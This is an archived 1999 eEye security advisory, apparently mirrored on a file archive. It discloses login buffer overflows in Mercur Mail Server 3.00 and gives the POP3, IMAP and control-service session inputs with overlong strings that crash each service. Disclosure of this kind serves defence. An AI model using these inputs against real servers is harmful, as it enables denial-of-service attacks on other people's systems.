never stop questioning

eeye.99-02-21.mercur_mail

eeye.99-02-21.mercur_mail
Posted Sep 23, 1999

eeye.99-02-21.mercur_mail

MD5 | 5013a8cc335a8029f3feb6251c95921f

eeye.99-02-21.mercur_mail

Change Mirror Download

[INLINE] [INLINE]
[INLINE] eEyelogosmall
Home Hire News Alerts Articles Books Tools Links Contact Press
[INLINE] [INLINE] [INLINE]

eEye - Digital Security Team Alert

Multiple Vulnerabilites in Mercur Mail Server
Systems Affected
Mercur v3.00
Release Date
February 21, 1999
Advisory Code
AD02211999
Description:
There are multiple places in Mercur where they do not use proper bounds checking. The following all
result in a Denial of Service against the service in question.
The pop3 (110) service has an overflow in the login function.
+OK MERCUR POP3-Server (v3.00.24 Unregistered) for Windows NT ready at Sun,
21 Feb 1999 22:05:28 -0800
user touchmyspecialspot
+OK <touchmyspecialspot>
pass glob
Where glob is 2400 characters. It could work with less or more.
The imapd (143) service has an overflow in the login process as well.
OK MERCUR IMAP4-Server (v3.00.26 Unregistered) for Windows NT ready at
Sun, 21 Feb 1999 22:12:30 -0800
x login glob1 glob2
Where glob1 is 300 characters and glob2 is 400 characters. Once again diffrent lengths will work.
The Administrative Control service (32000) also has a login overflow.
MERCUR Control-Service (v3.00.21 Unregistered) for Windows NT ready at Sun,
21 Feb 1999 22:16:54 -0800
Username: blah
Password: glob
Where glob is 900 characters. Once again size may vary.
Vendor Status
Vendor was contacted a week ago, Waiting for a response :-(
Copyright (c) 1999 eEye Digital Security Team

Permission is hereby granted for the redistribution of this alert electronically. It is not to be
edited in any way without express consent of eEye. If you wish to reprint the whole or any part of
this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

Disclaimer:

The information within this paper may change without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security Team

info@eEye.com
http://www.eEye.com
[INLINE]
[LINK]
[INLINE]

Copyright © 1998-1999 eEye.com - All Rights Reserved. eEye is an www.eCompany.com Venture.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close